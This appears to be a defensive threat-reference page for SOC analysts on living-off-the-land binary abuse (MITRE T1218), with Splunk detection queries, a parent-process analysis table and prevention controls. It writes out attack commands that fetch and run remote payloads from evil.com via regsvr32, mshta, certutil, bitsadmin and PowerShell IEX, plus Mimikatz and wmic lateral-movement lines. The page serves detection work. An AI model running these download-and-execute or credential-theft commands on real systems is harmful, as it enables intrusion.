Threats
T1218Living-off-the-Land Binaries
How attackers abuse signed Microsoft binaries to evade detection --- the LOLBins that every SOC analyst must recognize and the command-line patterns that reveal their malicious use.
View on Graph
What LOLBins Are and Why Attackers Love Them
- LOLBins (Living-off-the-Land Binaries) are trusted, Microsoft-signed executables that attackers misuse to evade detection and application allowlisting.
- MITRE ATT&CK maps LOLBin abuse to
T1218(System Binary Proxy Execution), coveringregsvr32.exe,mshta.exe,cmstp.exe,certutil.exe, and dozens more. - Because these binaries are Microsoft-signed, security tools must allow them to execute — making them effective across on-prem and cloud environments.
- Attackers exploit this trust: instead of dropping custom malware that might get flagged, they use tools already on the system.
The LOLBins Every Analyst Must Recognize
PowerShell (T1059.001) — The Swiss Army Knife
PowerShell is the most abused LOLBin. It can download payloads, execute code, access the Windows API, and run scripts entirely in memory.
Suspicious command-line patterns:
| Pattern | What It Does | Detection |
|---|---|---|
powershell -EncodedCommand <base64> | Executes base64-encoded script — hides the actual command | Event 4688 with -Enc or -EncodedCommand |
powershell -c <inline command> | Runs inline command without script file | Suspicious if parent process is Office, browser, or email client |
powershell IEX (New-Object Net.WebClient).DownloadString('http://...') | Downloads and executes remote payload without writing to disk | Event 4688 with DownloadString, WebClient, IEX |
powershell -NoProfile -WindowStyle Hidden | Runs silently — no console window | Hidden window flag is itself suspicious for non-administrative use |
powershell -Command "Invoke-Mimikatz" | Loads Mimikatz in memory | Event 4688 with Mimikatz function names |
SPL query — detect suspicious PowerShell (also applicable to credential dumping scenarios):
index=windows sourcetype="WinEventLog:Security" EventCode=4688
| search NewProcessName="*powershell.exe"
| where CommandLine LIKE "%-EncodedCommand%" OR CommandLine LIKE "%IEX%" OR CommandLine LIKE "%DownloadString%" OR CommandLine LIKE "-WindowStyle Hidden"
| stats values(CommandLine) as CommandLines by ParentProcessName, SubjectUserName, ComputerName
| eval alert = "HIGH — suspicious PowerShell: " . ParentProcessName . " spawned powershell.exe"Rundll32 (T1218.011) — The DLL Runner
rundll32.exe executes DLLs. Attackers use it to run malicious DLLs and JavaScript.
Suspicious patterns:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...— JavaScript execution via rundll32rundll32.exe <malicious.dll>,<export>— loading attacker-supplied DLLrundll32.exe zipfldr.dll,RouteTheCall <file.zip>— launching via ZIP functionality
Regsvr32 (T1218.010) — The COM Registrar
regsvr32.exe registers COM components. Attackers use it to execute scripts hosted remotely.
Suspicious command:
regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dllThis loads a scriptlet from a remote URL using the legitimate scrobj.dll — no malware on disk.
Mshta (T1218.005) — The HTLA Runner
mshta.exe executes Microsoft HTML Applications (.hta files). Attackers use it to run JavaScript/VBScript.
Suspicious patterns:
mshta.exe http://evil.com/payload.hta— remote .hta executionmshta.exe javascript:"<script>...</script>"— inline script executionmshta.exe "C:\Users\Public\malicious.hta"— .hta in non-standard location
Certutil (no MITRE sub-technique — utility abuse)
certutil.exe is a built-in certificate utility. Attackers abuse its download and decode functionality.
Suspicious patterns:
certutil -urlcache -split -f http://evil.com/payload.exe— downloads a file from a URLcertutil -decode encoded.txt output.exe— decodes base64-encoded executablecertutil -ping— connectivity check to attacker infrastructure
Wmic (T1047) — The WMI Executioner
wmic.exe provides WMI access from the command line. Attackers use it for process creation, lateral movement, and task execution.
Suspicious patterns:
wmic process call create "powershell.exe -EncodedCommand..."— creates a new process via WMIwmic /node:TARGET_SERVER process call create "cmd.exe /c ..."— lateral movement to remote hostwmic /node:TARGET_SERVER /user:DOMAIN\attacker process call create ...— authentication for lateral movement
Cscript / Wscript (T1059.005) — Script Hosts
cscript.exe and wscript.exe run VBScript and JScript. Dropped script files in non-standard locations are suspicious.
Suspicious patterns:
.vbsor.jsfiles in%TEMP%,%APPDATA%, or userDownloadsfolder- Scripts making network connections (
WinHttp.WinHttpRequest,MSXML2.ServerXMLHTTP) - Scripts running from non-standard parent processes (email client, browser)
BITSAdmin (T1197) — Background Downloader
bitsadmin.exe downloads files via Background Intelligent Transfer Service (BITS). It can survive reboots and proxy changes.
Suspicious patterns:
bitsadmin /transfer job /download /priority high http://evil.com/payload.exe C:\Users\Public\payload.exebitsadmin /create /download http://evil.com/stage2.ps1 C:\temp\stage2.ps1- BITS jobs created by non-admin users
Detection — Finding LOLBin Abuse
The Parent-Process Analysis Pattern
The most effective detection technique for LOLBin abuse is parent-child process analysis. The same program run from different parent processes means different things:
| LOLBin | Normal Parent | Suspicious Parent | Suspicious Child |
|---|---|---|---|
powershell.exe | explorer.exe (user runs script), taskeng.exe (scheduled task) | winword.exe, excel.exe, outlook.exe, chrome.exe, firefox.exe | Any network connection (net.exe, nslookup.exe) |
rundll32.exe | svchost.exe, explorer.exe | powershell.exe, winword.exe, wscript.exe | powershell.exe, cmd.exe |
regsvr32.exe | svchost.exe (COM registration) | wscript.exe, explorer.exe (user directory) | DNS queries to uncommon domains |
mshta.exe | System (rarely run legitimately anymore) | Any user-interactive process | powershell.exe, cmd.exe, network connections |
certutil.exe | System (certificate operations) | cmd.exe, powershell.exe | Network connections (download) |
wmic.exe | svchost.exe (admin tasks) | powershell.exe, explorer.exe (non-admin) | cmd.exe, powershell.exe on remote host — a key insider threat signal |
SPL query — detect suspicious LOLBin parent process:
index=windows sourcetype="WinEventLog:Security" EventCode=4688
| search NewProcessName IN ("*powershell.exe", "*rundll32.exe", "*regsvr32.exe", "*mshta.exe", "*certutil.exe", "*wmic.exe", "*cscript.exe", "*wscript.exe", "*bitsadmin.exe")
| search ParentProcessName IN ("*winword.exe", "*excel.exe", "*outlook.exe", "*powerpnt.exe", "*chrome.exe", "*firefox.exe", "*msedge.exe")
| eval alert = "CRITICAL — LOLBin abuse: " . ParentProcessName . " spawned " . NewProcessName
| table _time, ComputerName, SubjectUserName, ParentProcessName, NewProcessName, CommandLine, alertCommand-Line Analysis
Focus on these signal-rich patterns in command lines:
- URLs in command lines — any LOLBin with an HTTP/HTTPS URL is suspicious (except
certutilwhich legitimately fetches CRLs) - Base64 strings —
-EncodedCommand, long base64 in/i:parameters - Multiple flags — legitimate use of LOLBins tends to use 1-2 flags. Attackers use 4+ (e.g.,
regsvr32 /s /n /u /i:) - Unusual file extensions —
.ps1,.vbs,.hta,.dll,.exefiles in%TEMP%or%APPDATA%
Network Connection Correlation
When a LOLBin executes and immediately makes a network connection, that is the strongest single signal. Correlate process creation (4688) with network connection events (Sysmon Event 3):
SPL query — detect LOLBin with immediate network connection:
index=windows sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=3 (Network connection detected)
| search Image IN ("*powershell.exe", "*rundll32.exe", "*regsvr32.exe", "*mshta.exe", "*certutil.exe", "*wmic.exe")
| stats values(DestinationIp) as DestIPs, values(DestinationPort) as DestPorts, values(DestinationHostname) as DestHosts by SourceHostname, Image, CommandLine
| eval alert = "HIGH — " . Image . " on " . SourceHostname . " making network connections to " . mvcount(DestIPs) . " IPs"
| table SourceHostname, Image, CommandLine, DestIPs, DestPorts, alertPrevention
| Control | What It Prevents | Implementation |
|---|---|---|
| AppLocker / WDAC | Blocks non-approved executables | Only allow Microsoft-signed + organization-signed binaries. Blocks untrusted binaries but misses LOLBins. |
| ASR Rules | Blocks specific LOLBin abuse patterns | Block Office applications from creating child processes, Block JavaScript/VBScript execution |
| Constrained Language Mode (PowerShell) | Prevents PowerShell-based LOLBin abuse | Set System.Environment __PSLockdownPolicy or use WDAC to enforce CLM |
| AMSI | Detects malicious script content | Bypasses apply but many are detected by AMSI |
| Event ID 4688 with command-line logging | Provides visibility into LOLBin usage | Enable command-line logging in Group Policy |
| Sysmon Event 1 with command-line logging | More detailed process creation telemetry | Configure Sysmon to capture all process creation with command lines |
Related
- Cobalt Strike — Detection and Beacon Analysis — detection and response for T1055, T1572, T1071 techniques
- EDR Basics — detection and response for T1059, T1003, T1055, T1204, T1562 techniques
- Sigma Rules — detection and response for T1059, T1110 techniques
- Process Injection (T1055) — detection and response for T1055 techniques